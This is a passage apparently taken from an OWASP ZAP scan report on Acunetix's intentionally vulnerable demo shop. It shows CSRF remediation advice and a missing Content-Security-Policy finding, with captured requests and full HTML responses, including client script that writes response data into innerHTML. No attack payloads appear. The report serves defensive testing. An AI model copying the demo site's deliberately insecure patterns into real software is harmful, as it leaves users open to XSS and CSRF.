border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>searched for: ZAP</h2></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
Instances | 44 |
Solution |
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
For example, use anti-CSRF packages such as the OWASP CSRFGuard.
Phase: Implementation
Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.
Phase: Architecture and Design
Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).
Note that this can be bypassed using XSS.
Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.
Note that this can be bypassed using XSS.
Use the ESAPI Session Management control.
This control includes a component for CSRF.
Do not use the GET method for any request that triggers a state change.
Phase: Implementation
Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.
|
Reference |
http://projects.webappsec.org/Cross-Site-Request-Forgery
http://cwe.mitre.org/data/definitions/352.html |
Tags |
OWASP_2021_A01
WSTG-v42-SESS-05 OWASP_2017_A05 |
CWE Id | 352 |
WASC Id | 9 |
Plugin Id | 10202 |
Medium |
Content Security Policy (CSP) Header Not Set |
---|---|
Description |
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page — covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.
|
URL | http://testphp.vulnweb.com |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 213 bytes. |
GET http://testphp.vulnweb.com HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:43 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4958 |
Response Body - size: 4,958 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>Home of Acunetix Art</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for Acunetix WVS.</h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/ |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 447 bytes. |
GET http://testphp.vulnweb.com/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site Sec-Fetch-User: ?1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:14:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4958 |
Response Body - size: 4,958 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>Home of Acunetix Art</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for Acunetix WVS.</h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/AJAX/index.php |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 265 bytes. |
GET http://testphp.vulnweb.com/AJAX/index.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:48 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4236 |
Response Body - size: 4,236 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>ajax test</title> <link href="styles.css" rel="stylesheet" type="text/css" /> <script type="text/javascript"> var httpreq = null; function SetContent(XML) { var items = XML.getElementsByTagName('items').item(0).getElementsByTagName('item'); var inner = '<ul>'; for(i=0; i<items.length; i++){ inner = inner + '<li><a href="javascript:getInfo(\'' + items[i].attributes.item(0).value + '\', \'' + items[i].attributes.item(1).value + '\')">' + items[i].firstChild.nodeValue + '</a></li>'; } inner = inner + '</ul>' cd = document.getElementById('contentDiv'); cd.innerHTML = inner; id = document.getElementById('infoDiv'); id.innerHTML = ''; } function httpCompleted() { if (httpreq.readyState==4 && httpreq.status==200) { SetContent(httpreq.responseXML); httpreq = null; } } function SetInfo(XML) { var ii = XML.getElementsByTagName('iteminfo').item(0); var inner = ''; inner = inner + '<p><strong>' + ii.getElementsByTagName('name').item(0).firstChild.nodeValue + '</strong></p>'; pict = ii.getElementsByTagName('picture'); if(pict.length>0){ inner = inner + '<img src="../showimage.php?file=' + pict.item(0).firstChild.nodeValue + '"/>'; } descs = ii.getElementsByTagName('description'); for (i=0; i<descs.length; i++){ inner = inner + '<p>' + descs.item(i).firstChild.nodeValue + '</p>'; } id = document.getElementById('infoDiv'); id.innerHTML = inner; } function httpInfoCompleted() { if (httpreq.readyState==4 && httpreq.status==200) { SetInfo(httpreq.responseXML); httpreq = null; } } function loadSomething(what) { getHttpRequest(); httpreq.open('GET', what, true); httpreq.send(''); } function getInfo(where, which) { getHttpRequest(); httpreq.onreadystatechange = httpInfoCompleted; if (where=='infotitle'){ httpreq.open('POST', where+'.php', true); httpreq.setRequestHeader('content-type', 'application/x-www-form-urlencoded'); httpreq.send('id='+which); } else { httpreq.open('GET', where+'.php?id='+which, true); httpreq.send(''); } } function xmlCompleted () { if (httpreq.readyState==4 && httpreq.status==200) { xd = document.getElementById('xmlDiv'); xd.innerHTML = httpreq.responseText; httpreq = null; } } function sendXML () { getHttpRequest(); httpreq.onreadystatechange = xmlCompleted; httpreq.open('POST', 'showxml.php'); httpreq.setRequestHeader('content-type', 'text/xml'); httpreq.send('<xml><node name="nodename1">nodetext1</node><node name="nodename2">nodetext2</node></xml>'); } function getHttpRequest() { // free the curent one if (httpreq!=null){ httpreq.abort(); httpreq = null; } if( window.XMLHttpRequest ) { httpreq = new XMLHttpRequest(); if (httpreq.overrideMimeType) { httpreq.overrideMimeType('text/xml'); } } else if(ActiveXObject) { httpreq = new ActiveXObject("Msxml2.XMLHTTP"); } httpreq.onreadystatechange = httpCompleted; } function SetMyCookie() { document.cookie = "mycookie=3"; alert('A cookie was set by JavaScript.'); } </script> </head> <body> <table border="0" cellpadding="3" width="500" align="center"> <tr> <td class="bordered"> <a href="javascript:loadSomething('artists.php');">artists</a> | <a href="javascript:loadSomething('categories.php');">categories</a> | <a href="#" onclick="loadSomething('titles.php')">titles</a> | <a href="#" onclick="sendXML()">send xml</a> | <a href="#" onclick="SetMyCookie()">setcookie</a> </td> </tr> <tr> <td> <div id="contentDiv"> </div> </td> </tr> <tr> <td> <div id="infoDiv"> </div> </td> </tr> <tr> <td> <div id="xmlDiv"> </div> </td> </tr> </table> </body> </html> |
URL | http://testphp.vulnweb.com/artists.php |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 262 bytes. |
GET http://testphp.vulnweb.com/artists.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:45 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5328 |
Response Body - size: 5,328 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class='story'><a href='artists.php?artist=1'><h3>r4w8173</h3></a><p><a href='#' onClick="window.open('./comment.php?aid=1','comment','width=500,height=400')">comment on this artist</a></p></div><div class='story'><a href='artists.php?artist=2'><h3>Blad3</h3></a><p><a href='#' onClick="window.open('./comment.php?aid=2','comment','width=500,height=400')">comment on this artist</a></p></div><div class='story'><a href='artists.php?artist=3'><h3>lyzae</h3></a><p><a href='#' onClick="window.open('./comment.php?aid=3','comment','width=500,height=400')">comment on this artist</a></p></div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/artists.php?artist=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 283 bytes. |
GET http://testphp.vulnweb.com/artists.php?artist=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6251 |
Response Body - size: 6,251 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>artist: r4w8173</h2><div class='story'><p><p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p> <p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p></p><p><a href='listproducts.php?artist=1'>view pictures of the artist</a></p><p><a href='#' onClick="window.open('./comment.php?aid=1','comment','width=500,height=400')">comment on this artist</a></p></div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how 